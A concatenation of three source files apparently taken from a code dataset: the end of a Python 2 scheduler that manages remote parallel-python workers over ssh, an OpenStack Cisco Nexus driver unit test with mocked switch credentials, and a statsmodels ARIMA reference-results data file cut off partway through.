remote slave processes should be stored. Together with the
'kill_slaves' function this makes it possible to quickly kill all
remote slave processes in case something goes wrong.
If None, a tempfile is created.
"""
self._remote_slaves = remote_slaves
self._running_remote_slaves = None # list of strings 'address:port'
# list with processes for the ssh connections to the slaves
self._ssh_procs = None
self._remote_pids = None # list of the pids of the remote servers
self._port = port
if slave_kill_filename is None:
slave_kill_file = tempfile.mkstemp(prefix='MDPtmp-')[1]
self.slave_kill_file = slave_kill_file
self._secret = secret
self._slave_nice = nice
self._timeout = timeout
if not source_paths:
self._source_paths = []
else:
self._source_paths = source_paths
if remote_python_executable is None:
remote_python_executable = sys.executable
self._python_executable = remote_python_executable
module_file = os.path.abspath(__file__)
self._script_path = os.path.dirname(module_file)
self.verbose = verbose
# start ppserver
self._start_slaves()
ppslaves = tuple(["%s:%d" % (address, self._port)
for address in self._running_remote_slaves])
ppserver = pp.Server(ppservers=ppslaves,
ncpus=n_local_workers,
secret=self._secret)
super(NetworkPPScheduler, self).__init__(ppserver=ppserver,
max_queue_length=max_queue_length,
result_container=result_container,
verbose=verbose)
def _shutdown(self):
"""Shutdown all slaves."""
for ssh_proc in self._ssh_procs:
os.kill(ssh_proc.pid, signal.SIGQUIT)
super(NetworkPPScheduler, self)._shutdown()
if self.verbose:
print "All slaves shut down."
def start_slave(self, address, ncpus="autodetect"):
"""Start a single remote slave.
The return value is a tuple of the ssh process handle and
the remote pid.
"""
try:
print "starting slave " + address + " ..."
proc = subprocess.Popen(["ssh","-T", "%s" % address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("cd %s\n" % self._script_path)
cmd = (self._python_executable +
" pp_slave_script.py %d %d %d %s %d" %
(self._slave_nice, self._port, self._timeout, self._secret,
ncpus))
proc.stdin.write(cmd + "\n")
# send additional information to the remote process
proc.stdin.write(self._python_executable + "\n")
for sys_path in self._source_paths:
proc.stdin.write(sys_path + "\n")
proc.stdin.write("_done_" + "\n")
# print status message from slave
sys.stdout.write(address + ": " + proc.stdout.readline())
# get PID for remote slave process
pid = None
if self.verbose:
print "*** output from slave %s ***" % address
while pid is None:
# the slave process might first output some hello message
try:
value = proc.stdout.readline()
if self.verbose:
print value
pid = int(value)
except ValueError:
pass
if self.verbose:
print "*** output end ***"
return (proc, pid)
except:
print "Initialization of slave %s has failed." % address
traceback.print_exc()
return None
def _start_slaves(self):
"""Start remote slaves.
The slaves that could be started are recorded in a text file, one per
line in the form address:remote_pid:ssh_pid
"""
with open(self.slave_kill_file, 'w') as slave_kill_file:
self._running_remote_slaves = []
self._remote_pids = []
self._ssh_procs = []
for (address, ncpus) in self._remote_slaves:
ssh_proc, pid = self.start_slave(address, ncpus=ncpus)
if pid is not None:
slave_kill_file.write("%s:%d:%d\n" %
(address, pid, ssh_proc.pid))
self._running_remote_slaves.append(address)
self._remote_pids.append(pid)
self._ssh_procs.append(ssh_proc)
def kill_slaves(slave_kill_filename):
"""Kill all remote slaves which are stored in the given file.
This function is only meant for emergency situations, when something
went wrong and the slaves have to be killed manually.
"""
with open(slave_kill_filename) as tempfile:
for line in tempfile:
address, pid, ssh_pid = line.split(":")
pid = int(pid)
ssh_pid = int(ssh_pid)
# open ssh connection to kill the remote slave
proc = subprocess.Popen(["ssh","-T", address],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
proc.stdin.write("kill %d\n" % pid)
proc.stdin.flush()
# kill old ssh connection
try:
os.kill(ssh_pid, signal.SIGKILL)
except:
pass
# a kill might prevent the kill command transmission
# os.kill(proc.pid, signal.SIGQUIT)
print "killed slave " + address + " (pid %d)" % pid
print "all slaves killed."
if __name__ == "__main__":
if len(sys.argv) == 2:
kill_slaves(sys.argv[1])
else:
sys.stderr.write("usage: %s slave_list.txt\n" % __file__)
|
lgpl-2.1
|
nikolay-fedotov/networking-cisco
|
networking_cisco/tests/unit/ml2/drivers/cisco/nexus/test_cisco_nexus.py
|
1
|
7977
|
# Copyright (c) 2013 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
import mock
from oslo_utils import importutils
import testtools
from networking_cisco.plugins.ml2.drivers.cisco.nexus import (
nexus_network_driver)
from networking_cisco.plugins.ml2.drivers.cisco.nexus import constants
from networking_cisco.plugins.ml2.drivers.cisco.nexus import exceptions
from networking_cisco.plugins.ml2.drivers.cisco.nexus import mech_cisco_nexus
from networking_cisco.plugins.ml2.drivers.cisco.nexus import nexus_db_v2
from neutron.common import constants as n_const
from neutron.extensions import portbindings
from neutron.plugins.ml2 import driver_api as api
from neutron.tests.unit import testlib_api
NEXUS_IP_ADDRESS = '1.1.1.1'
NEXUS_IP_ADDRESS_PC = '2.2.2.2'
NEXUS_IP_ADDRESS_DUAL = '3.3.3.3'
HOST_NAME_1 = 'testhost1'
HOST_NAME_2 = 'testhost2'
HOST_NAME_PC = 'testpchost'
HOST_NAME_DUAL = 'testdualhost'
INSTANCE_1 = 'testvm1'
INSTANCE_2 = 'testvm2'
INSTANCE_PC = 'testpcvm'
INSTANCE_DUAL = 'testdualvm'
NEXUS_PORT_1 = 'ethernet:1/10'
NEXUS_PORT_2 = 'ethernet:1/20'
NEXUS_PORTCHANNELS = 'portchannel:2'
NEXUS_DUAL = 'ethernet:1/3,portchannel:2'
VLAN_ID_1 = 267
VLAN_ID_2 = 265
VLAN_ID_PC = 268
VLAN_ID_DUAL = 269
DEVICE_OWNER = 'compute:test'
NEXUS_SSH_PORT = '22'
PORT_STATE = n_const.PORT_STATUS_ACTIVE
NETWORK_TYPE = 'vlan'
NEXUS_DRIVER = ('networking_cisco.plugins.ml2.drivers.cisco.nexus.'
'nexus_network_driver.CiscoNexusDriver')
class FakeNetworkContext(object):
"""Network context for testing purposes only."""
def __init__(self, segment_id):
self._network_segments = {api.SEGMENTATION_ID: segment_id,
api.NETWORK_TYPE: NETWORK_TYPE}
@property
def network_segments(self):
return self._network_segments
class FakePortContext(object):
"""Port context for testing purposes only."""
def __init__(self, device_id, host_name, network_context):
self._port = {
'status': PORT_STATE,
'device_id': device_id,
'device_owner': DEVICE_OWNER,
portbindings.HOST_ID: host_name,
portbindings.VIF_TYPE: portbindings.VIF_TYPE_OVS
}
self._network = network_context
self._segment = network_context.network_segments
@property
def current(self):
return self._port
@property
def network(self):
return self._network
@property
def bottom_bound_segment(self):
return self._segment
class TestCiscoNexusDevice(testlib_api.SqlTestCase):
"""Unit tests for Cisco ML2 Nexus device driver."""
TestConfigObj = collections.namedtuple(
'TestConfigObj',
'nexus_ip_addr host_name nexus_port instance_id vlan_id')
test_configs = {
'test_config1': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_1,
NEXUS_PORT_1,
INSTANCE_1,
VLAN_ID_1),
'test_config2': TestConfigObj(
NEXUS_IP_ADDRESS,
HOST_NAME_2,
NEXUS_PORT_2,
INSTANCE_2,
VLAN_ID_2),
'test_config_portchannel': TestConfigObj(
NEXUS_IP_ADDRESS_PC,
HOST_NAME_PC,
NEXUS_PORTCHANNELS,
INSTANCE_PC,
VLAN_ID_PC),
'test_config_dual': TestConfigObj(
NEXUS_IP_ADDRESS_DUAL,
HOST_NAME_DUAL,
NEXUS_DUAL,
INSTANCE_DUAL,
VLAN_ID_DUAL),
}
def setUp(self):
"""Sets up mock ncclient, and switch and credentials dictionaries."""
super(TestCiscoNexusDevice, self).setUp()
# Use a mock netconf client
mock_ncclient = mock.Mock()
mock.patch.object(nexus_network_driver.CiscoNexusDriver,
'_import_ncclient',
return_value=mock_ncclient).start()
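# patch the driver's ncclient import so no real NETCONF connection is attempted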
def new_nexus_init(mech_instance):
mech_instance.driver = importutils.import_object(NEXUS_DRIVER)
mech_instance._nexus_switches = {}
for name, config in TestCiscoNexusDevice.test_configs.items():
ip_addr = config.nexus_ip_addr
host_name = config.host_name
nexus_port = config.nexus_port
mech_instance._nexus_switches[(ip_addr,
host_name)] = nexus_port
mech_instance._nexus_switches[(ip_addr,
'ssh_port')] = NEXUS_SSH_PORT
mech_instance._nexus_switches[(ip_addr,
constants.USERNAME)] = 'admin'
mech_instance._nexus_switches[(ip_addr,
constants.PASSWORD)] = 'password'
mech_instance.driver.nexus_switches = (
mech_instance._nexus_switches)
mock.patch.object(mech_cisco_nexus.CiscoNexusMechanismDriver,
'__init__', new=new_nexus_init).start()
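# replace the mechanism driver's __init__ so switch credentials come from
# the test fixtures above instead of oslo config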
self._cisco_mech_driver = (mech_cisco_nexus.
CiscoNexusMechanismDriver())
def _create_delete_port(self, port_config):
"""Tests creation and deletion of a virtual port."""
nexus_ip_addr = port_config.nexus_ip_addr
host_name = port_config.host_name
nexus_port = port_config.nexus_port
instance_id = port_config.instance_id
vlan_id = port_config.vlan_id
network_context = FakeNetworkContext(vlan_id)
port_context = FakePortContext(instance_id, host_name,
network_context)
self._cisco_mech_driver.update_port_precommit(port_context)
self._cisco_mech_driver.update_port_postcommit(port_context)
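# each interface listed in nexus_port (comma-separated) should now have
# exactly one port binding row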
for port_id in nexus_port.split(','):
bindings = nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
self.assertEqual(len(bindings), 1)
self._cisco_mech_driver.delete_port_precommit(port_context)
self._cisco_mech_driver.delete_port_postcommit(port_context)
for port_id in nexus_port.split(','):
with testtools.ExpectedException(
exceptions.NexusPortBindingNotFound):
nexus_db_v2.get_nexusport_binding(port_id,
vlan_id,
nexus_ip_addr,
instance_id)
def test_create_delete_ports(self):
"""Tests creation and deletion of two new virtual Ports."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config1'])
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config2'])
def test_create_delete_portchannel(self):
"""Tests creation of a port over a portchannel."""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_portchannel'])
def test_create_delete_dual(self):
"""Tests creation and deletion of dual ports for single server"""
self._create_delete_port(
TestCiscoNexusDevice.test_configs['test_config_dual'])
|
apache-2.0
|
edhuckle/statsmodels
|
statsmodels/tsa/tests/results/arima111nc_css_results.py
|
36
|
43835
|
import numpy as np
llf = np.array([-242.89663276735])
nobs = np.array([ 202])
k = np.array([ 3])
k_exog = np.array([ 1])
sigma = np.array([ .8053519404535])
chi2 = np.array([ 15723.381396967])
df_model = np.array([ 2])
k_ar = np.array([ 1])
k_ma = np.array([ 1])
params = np.array([ .99479180506163,
-.84461527652809,
.64859174799221])
cov_params = np.array([ .00008904968254,
-.00023560410507,
.00012795903324,
-.00023560410507,
.00131628534915,
-.00022462340695,
.00012795903324,
-.00022462340695,
.0005651128627]).reshape(3,3)
xb = np.array([ 0,
0,
.02869686298072,
.05651443824172,
.0503994859755,
.06887971609831,
.05940540507436,
.08067328482866,
.08167565613985,
.06429278105497,
.07087650150061,
.06886467337608,
.06716959923506,
.08230647444725,
.07099691033363,
.08401278406382,
.07996553182602,
.07354256510735,
.09366323798895,
.08811800926924,
.10296355187893,
.08846370875835,
.0852297320962,
.08700425922871,
.09751411527395,
.09737934917212,
.11228405684233,
.1053489819169,
.12352022528648,
.16439816355705,
.1643835157156,
.19891132414341,
.17551273107529,
.17827558517456,
.19562774896622,
.21028305590153,
.23767858743668,
.24580039083958,
.28269505500793,
.29883882403374,
.31247469782829,
.35402658581734,
.37410452961922,
.39106267690659,
.42040377855301,
.44518512487411,
.43608102202415,
.44340893626213,
.44959822297096,
.40977239608765,
.42118826508522,
.40079545974731,
.38357082009315,
.36902260780334,
.35673499107361,
.36137464642525,
.38031083345413,
.47139286994934,
.47323387861252,
.60994738340378,
.69538277387619,
.7825602889061,
.84117436408997,
.9657689332962,
1.0109325647354,
.95897275209427,
.96013957262039,
.9461076259613,
.9342554807663,
.83413934707642,
.83968591690063,
.84437066316605,
.83330947160721,
.8990553021431,
.87949693202972,
.86297762393951,
.89407861232758,
.93536442518234,
1.0303052663803,
1.1104937791824,
1.1481873989105,
1.2851470708847,
1.4458787441254,
1.5515991449356,
1.7309991121292,
1.8975404500961,
1.8579913377762,
1.8846583366394,
1.9672524929047,
1.9469071626663,
2.0048115253448,
1.9786299467087,
1.8213576078415,
1.6284521818161,
1.7508568763733,
1.5689061880112,
1.2950873374939,
1.2290096282959,
1.1882168054581,
1.1537625789642,
1.1697143316269,
1.1681711673737,
1.106795668602,
1.0849931240082,
1.006507396698,
1.0453414916992,
.98803448677063,
.95465070009232,
1.0165599584579,
.67838954925537,
.69311982393265,
.69054269790649,
.76345545053482,
.84005492925644,
.87471830844879,
.91901183128357,
.92638796567917,
.96265280246735,
1.0083012580872,
1.0618740320206,
1.0921038389206,
1.2077431678772,
1.2303256988525,
1.174311041832,
1.3072115182877,
1.314337015152,
1.3503924608231,
1.5760731697083,
1.5264053344727,
1.34929728508,
1.304829955101,
1.2522557973862,
1.222869515419,
1.198047041893,
1.1770839691162,
1.1743944883347,
1.1571066379547,
1.1274864673615,
1.0574153661728,
1.058304309845,
.99898308515549,
.9789143204689,
1.0070173740387,
1.000718832016,
1.0104174613953,
1.0486439466476,
1.0058424472809,
.98470783233643,
1.0119106769562,
1.0649236440659,
1.0346088409424,
1.0540577173233,
1.0704846382141,
.97923594713211,
.90216588973999,
.9271782040596,
.85819715261459,
.75488126277924,
.78776079416275,
.77047789096832,
.77089905738831,
.8313245177269,
.82229107618332,
.90476810932159,
.94439232349396,
1.0379292964935,
1.1469690799713,
1.1489590406418,
1.2257302999496,
1.1554099321365,
1.1260533332825,
.9811190366745,
.8436843752861,
.95287209749222,
.90993344783783,
.94875508546829,
1.0115815401077,
.94450175762177,
.87282890081406,
.91741597652435,
.98511207103729,
.9972335100174,
1.0975805521011,
1.1823329925537,
1.1487929821014,
1.270641207695,
1.2083609104156,
1.696394443512,
1.4628355503082,
1.4307631254196,
1.5087975263596,
1.1542117595673,
1.2262620925903,
1.3880327939987,
1.3853038549423,
1.4396153688431,
1.7208145856857,
1.678991317749,
2.110867023468,
1.524417757988,
.57946246862411,
.56406193971634,
.74643105268478])
y = np.array([np.nan,
28.979999542236,
29.178695678711,
29.40651512146,
29.420400619507,
29.608880996704,
29.609405517578,
29.830673217773,
29.921676635742,
29.874292373657,
29.990877151489,
30.048864364624,
30.10717010498,
30.292304992676,
30.290996551514,
30.464012145996,
30.519966125488,
30.553541183472,
30.783664703369,
30.838117599487,
31.042964935303,
31.038463592529,
31.105230331421,
31.207004547119,
31.377513885498,
31.477378845215,
31.692283630371,
31.755348205566,
32.003520965576,
32.444396972656,
32.61438369751,
33.048908233643,
33.07551574707,
33.278274536133,
33.595630645752,
33.91028213501,
34.337677001953,
34.645801544189,
35.182697296143,
35.598838806152,
36.012474060059,
36.654026031494,
37.174102783203,
37.691062927246,
38.320404052734,
38.94518661499,
39.336082458496,
39.843410491943,
40.349597930908,
40.509769439697,
41.021186828613,
41.300796508789,
41.583572387695,
41.869022369385,
42.156734466553,
42.561374664307,
43.080310821533,
44.171394348145,
44.673233032227,
46.209945678711,
47.495380401611,
48.882556915283,
50.141174316406,
51.965770721436,
53.310932159424,
53.958972930908,
54.960140228271,
55.84610748291,
56.734252929688,
56.934139251709,
57.839687347412,
58.744373321533,
59.533309936523,
60.899055480957,
61.679496765137,
62.46297454834,
63.594078063965,
64.83536529541,
66.530303955078,
68.210494995117,
69.64818572998,
71.885147094727,
74.445877075195,
76.751594543457,
79.731002807617,
82.797538757324,
84.457992553711,
86.584655761719,
89.167251586914,
91.046905517578,
93.504814147949,
95.378631591797,
96.22135925293,
96.628448486328,
99.250854492188,
99.668907165527,
99.195091247559,
100.0290145874,
100.98822021484,
101.95376586914,
103.26971435547,
104.46817779541,
105.20679473877,
106.1849899292,
106.70650482178,
108.0453414917,
108.68803405762,
109.45465087891,
110.91656494141,
109.37838745117,
110.19312286377,
110.89054107666,
112.16345977783,
113.54005432129,
114.67472076416,
115.91901397705,
116.92639160156,
118.16265106201,
119.50830078125,
120.96187591553,
122.29209899902,
124.30773925781,
125.7303237915,
126.57431030273,
128.8072052002,
130.21432495117,
131.85038757324,
134.97607421875,
136.22640991211,
136.44931030273,
137.50482177734,
138.45225524902,
139.5228729248,
140.59803771973,
141.67707824707,
142.87438964844,
143.95710754395,
144.92749023438,
145.55741882324,
146.65830993652,
147.29898071289,
148.17890930176,
149.40701293945,
150.40071105957,
151.51042175293,
152.84864807129,
153.60585021973,
154.48471069336,
155.7119140625,
157.16493225098,
158.03460693359,
159.25405883789,
160.47047424316,
160.87922668457,
161.30215454102,
162.42718505859,
162.85820007324,
162.95487976074,
163.98776245117,
164.67047119141,
165.47090148926,
166.73132324219,
167.52229309082,
169.00477600098,
170.24440002441,
171.93792724609,
173.84696960449,
175.04895019531,
176.82572937012,
177.55540466309,
178.52604675293,
178.58113098145,
178.54368591309,
180.25286865234,
180.90992736816,
182.14875793457,
183.61158752441,
184.14450073242,
184.5728302002,
185.81741333008,
187.28511047363,
188.39723205566,
190.19758605957,
191.98233032227,
192.94879150391,
195.07064819336,
195.90835571289,
200.89639282227,
200.86282348633,
202.13075256348,
204.20880126953,
203.05419921875,
204.80026245117,
207.3080291748,
208.72329711914,
210.57261657715,
214.21580505371,
215.67597961426,
220.72087097168,
218.41342163086,
212.75346374512,
213.23506164551,
215.21542358398])
resid = np.array([np.nan,
.17000007629395,
.17130389809608,
-.03651398047805,
.11960058659315,
-.05888139456511,
.14059536159039,
.00932686589658,
-.11167634278536,
.04570783302188,
-.0108770346269,
-.00886330008507,
.10282856971025,
-.07230624556541,
.08900293707848,
-.0240114107728,
-.03996651992202,
.13645842671394,
-.03366377204657,
.10188252478838,
-.09296332299709,
-.01846401393414,
.01477065030485,
.0729955881834,
.00248436117545,
.10262141376734,
-.04228436201811,
.12465056031942,
.27647939324379,
.00560382334515,
.23561419546604,
-.1489082723856,
.02448422275484,
.12172746658325,
.10437148809433,
.18971465528011,
.06232447177172,
.25419962406158,
.11730266362429,
.10116269439459,
.2875237762928,
.14597341418266,
.12589547038078,
.20893961191177,
.17959471046925,
-.04518361017108,
.06391899287701,
.05659105628729,
-.24960128962994,
.09022761881351,
-.12118522822857,
-.10079623758793,
-.08357158303261,
-.06902338564396,
.04326653853059,
.13862533867359,
.61968916654587,
.02860714122653,
.92676383256912,
.59005337953568,
.60461646318436,
.41744044423103,
.85882639884949,
.33423033356667,
-.31093180179596,
.04102724045515,
-.06013804674149,
-.04610994458199,
-.63425624370575,
.06586220860481,
.06031560897827,
-.04437142238021,
.46668976545334,
-.09905604273081,
-.07949769496918,
.23702463507652,
.30592212080956,
.66463404893875,
.56969320774078,
.28950771689415,
.95181107521057,
1.1148544549942,
.75411820411682,
1.2484039068222,
1.1690024137497,
-.1975435167551,
.24200716614723,
.6153416633606,
-.06725100427866,
.45309436321259,
-.10480991750956,
-.97863000631332,
-1.2213591337204,
.8715478181839,
-1.1508584022522,
-1.7689031362534,
-.39508575201035,
-.22900961339474,
-.18821682035923,
.14623281359673,
.03029025532305,
-.36817568540573,
-.10679569840431,
-.48499462008476,
.29349562525749,
-.34534454345703,
-.18803144991398,
.44535079598427,
-2.2165644168854,
.12161350995302,
.00687709869817,
.50946187973022,
.53653997182846,
.25995117425919,
.32527860999107,
.08098815381527,
.27360898256302,
.33735024929047,
.39170032739639,
.23812144994736,
.80789774656296,
.19225835800171,
-.33032417297363,
.92568749189377,
.09278241544962,
.28566908836365,
1.5496014356613,
-.27607008814812,
-1.1263961791992,
-.24930645525455,
-.30482992529869,
-.15224970877171,
-.12287864089012,
-.09804095327854,
.02291300706565,
-.07438835501671,
-.15710659325123,
-.42748948931694,
.04259072244167,
-.35830733180046,
-.09898918122053,
.22108262777328,
-.00701736938208,
.0992873236537,
.28958559036255,
-.24864092469215,
-.10584850609303,
.21528913080692,
.38809850811958,
-.16492980718613,
.16538816690445,
.1459391862154,
-.57048463821411,
-.47923597693443,
.19784018397331,
-.4271782040596,
-.65820020437241,
.24511873722076,
-.0877638310194,
.02952514961362,
.42909786105156,
-.03132146969438,
.57771807909012,
.29522883892059,
.6555985212326,
.76207375526428,
.05302781611681,
.55105316638947,
-.42574247717857,
-.15540990233421,
-.92604118585587,
-.88112819194794,
.75632172822952,
-.25287514925003,
.29006350040436,
.45125409960747,
-.41159069538116,
-.44450175762177,
.32716807723045,
.48259317874908,
.11487878113985,
.70277869701385,
.60241633653641,
-.18233296275139,
.85120695829391,
-.37064728140831,
3.2916390895844,
-1.4963974952698,
-.16283248364925,
.56923681497574,
-2.3088004589081,
.51979947090149,
1.1197309494019,
.02996650896966,
.40969428420067,
1.9223841428757,
-.21881568431854,
2.9340152740479,
-3.8318600654602,
-6.239429473877,
-.08245316892862,
1.2339268922806,
1.1695692539215])
yr = np.array([np.nan,
.17000007629395,
.17130389809608,
-.03651398047805,
.11960058659315,
-.05888139456511,
.14059536159039,
.00932686589658,
-.11167634278536,
.04570783302188,
-.0108770346269,
-.00886330008507,
.10282856971025,
-.07230624556541,
.08900293707848,
-.0240114107728,
-.03996651992202,
.13645842671394,
-.03366377204657,
.10188252478838,
-.09296332299709,
-.01846401393414,
.01477065030485,
.0729955881834,
.00248436117545,
.10262141376734,
-.04228436201811,
.12465056031942,
.27647939324379,
.00560382334515,
.23561419546604,
-.1489082723856,
.02448422275484,
.12172746658325,
.10437148809433,
.18971465528011,
.06232447177172,
.25419962406158,
.11730266362429,
.10116269439459,
.2875237762928,
.14597341418266,
.12589547038078,
.20893961191177,
.17959471046925,
-.04518361017108,
.06391899287701,
.05659105628729,
-.24960128962994,
.09022761881351,
-.12118522822857,
-.10079623758793,
-.08357158303261,
-.06902338564396,
.04326653853059,
.13862533867359,
.61968916654587,
.02860714122653,
.92676383256912,
.59005337953568,
.60461646318436,
.41744044423103,
.85882639884949,
.33423033356667,
-.31093180179596,
.04102724045515,
-.06013804674149,
-.04610994458199,
-.63425624370575,
.06586220860481,
.06031560897827,
-.04437142238021,
.46668976545334,
-.09905604273081,
-.07949769496918,
.23702463507652,
.30592212080956,
.66463404893875,
.56969320774078,
.28950771689415,
.95181107521057,
1.1148544549942,
.75411820411682,
1.2484039068222,
1.1690024137497,
-.1975435167551,
.24200716614723,
.6153416633606,
-.06725100427866,
.45309436321259,
-.10480991750956,
-.97863000631332,
-1.2213591337204,
.8715478181839,
-1.1508584022522,
-1.7689031362534,
-.39508575201035,
-.22900961339474,
-.18821682035923,
.14623281359673,
.03029025532305,
-.36817568540573,
-.10679569840431,
-.48499462008476,
.29349562525749,
-.34534454345703,
-.18803144991398,
.44535079598427,
-2.2165644168854,
.12161350995302,
.00687709869817,
.50946187973022,
.53653997182846,
.25995117425919,
.32527860999107,
.08098815381527,
.27360898256302,
.33735024929047,
.39170032739639,
.23812144994736,
.80789774656296,
.19225835800171,
-.33032417297363,
.92568749189377,
.09278241544962,
.28566908836365,
1.5496014356613,
-.27607008814812,
-1.1263961791992,
-.24930645525455,
-.30482992529869,
-.15224970877171,
-.12287864089012,
-.09804095327854,
.02291300706565,
-.07438835501671,
-.15710659325123,
-.42748948931694,
.04259072244167,
-.35830733180046,
-.09898918122053,
.22108262777328,
-.00701736938208,
.0992873236537,
.28958559036255,
-.24864092469215,
-.10584850609303,
.21528913080692,
.38809850811958,
-.16492980718613,
.16538816690445,
.1459391862154,
-.57048463821411,
-.47923597693443,
.19784018397331,
-.4271782040596,
-.65820020437241,
.24511873722076,
-.0877638310194,
.02952514961362,
.42909786105156,
-.03132146969438,
.57771807909012,
.29522883892059,
.6555985212326,
.76207375526428,
.05302781611681,
.55105316638947,
-.42574247717857,
-.15540990233421,
-.92604118585587,
-.88112819194794,
.75632172822952,
-.25287514925003,
.29006350040436,
.45125409960747,
-.41159069538116,
-.44450175762177,
.32716807723045,
.48259317874908,
.11487878113985,
.70277869701385,
.60241633653641,
-.18233296275139,
.85120695829391,
-.37064728140831,
3.2916390895844,
-1.4963974952698,
-.16283248364925,
.56923681497574,
-2.3088004589081,
.51979947090149,
1.1197309494019,
.02996650896966,
.40969428420067,
1.9223841428757,
-.21881568431854,
2.9340152740479,
-3.8318600654602,
-6.239429473877,
-.08245316892862,
1.2339268922806,
1.1695692539215])
mse = np.array([ 1.1112809181213,
.6632194519043,
.65879660844803,
.65575885772705,
.65364873409271,
.65217137336731,
.65113133192062,
.6503963470459,
.64987552165985,
.64950579404831,
.64924287796021,
.64905577898026,
.64892256259918,
.64882761240005,
.64875996112823,
.64871168136597,
.64867728948593,
.64865279197693,
.64863526821136,
.64862281084061,
.64861387014389,
.64860755205154,
.64860302209854,
.64859980344772,
.64859747886658,
.64859586954117,
.64859467744827,
.64859384298325,
.6485932469368,
.64859282970428,
.64859253168106,
.64859229326248,
.64859211444855,
.64859199523926,
.64859193563461,
.64859187602997,
.64859187602997,
.64859181642532,
.64859181642532,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068,
.64859175682068])
stdp = np.array([ 0,
0,
.02869686298072,
.05651443824172,
.0503994859755,
.06887971609831,
.05940540507436,
.08067328482866,
.08167565613985,
.06429278105497,
.07087650150061,
.06886467337608,
.06716959923506,
.08230647444725,
.07099691033363,
.08401278406382,
.07996553182602,
.07354256510735,
.09366323798895,
.08811800926924,
.10296355187893,
.08846370875835,
.0852297320962,
.08700425922871,
.09751411527395,
.09737934917212,
.11228405684233,
.1053489819169,
.12352022528648,
.16439816355705,
.1643835157156,
.19891132414341,
.17551273107529,
.17827558517456,
.19562774896622,
.21028305590153,
.23767858743668,
.24580039083958,
.28269505500793,
.29883882403374,
.31247469782829,
.35402658581734,
.37410452961922,
.39106267690659,
.42040377855301,
.44518512487411,
.43608102202415,
.44340893626213,
.44959822297096,
.40977239608765,
.42118826508522,
.40079545974731,
.38357082009315,
.36902260780334,
.35673499107361,
.36137464642525,
.38031083345413,
.47139286994934,
.47323387861252,
.60994738340378,
.69538277387619,
.7825602889061,
.84117436408997,
.9657689332962,
1.0109325647354,
.95897275209427,
.96013957262039,
.9461076259613,
.9342554807663,
.83413934707642,
.83968591690063,
.84437066316605,
.83330947160721,
.8990553021431,
.87949693202972,
.86297762393951,
.89407861232758,
.93536442518234,
1.0303052663803,
1.1104937791824,
1.1481873989105,
1.2851470708847,
1.4458787441254,
1.5515991449356,
1.7309991121292,
1.8975404500961,
1.8579913377762,
1.8846583366394,
1.9672524929047,
1.9469071626663,
2.0048115253448,
1.9786299467087,
1.8213576078415,
1.6284521818161,
1.7508568763733,
1.5689061880112,
1.2950873374939,
1.2290096282959,
1.1882168054581,
1.1537625789642,
1.1697143316269,
1.1681711673737,
1.106795668602,
1.0849931240082,
1.006507396698,
1.0453414916992,
.98803448677063,
.95465070009232,
1.0165599584579,
.67838954925537,
.69311982393265,
.69054269790649,
.76345545053482,
.84005492925644,
.87471830844879,
.91901183128357,
.92638796567917,
.96265280246735,
1.0083012580872,
1.0618740320206,
1.0921038389206,
1.2077431678772,
1.2303256988525,
1.174311041832,
1.3072115182877,
1.314337015152,
1.3503924608231,
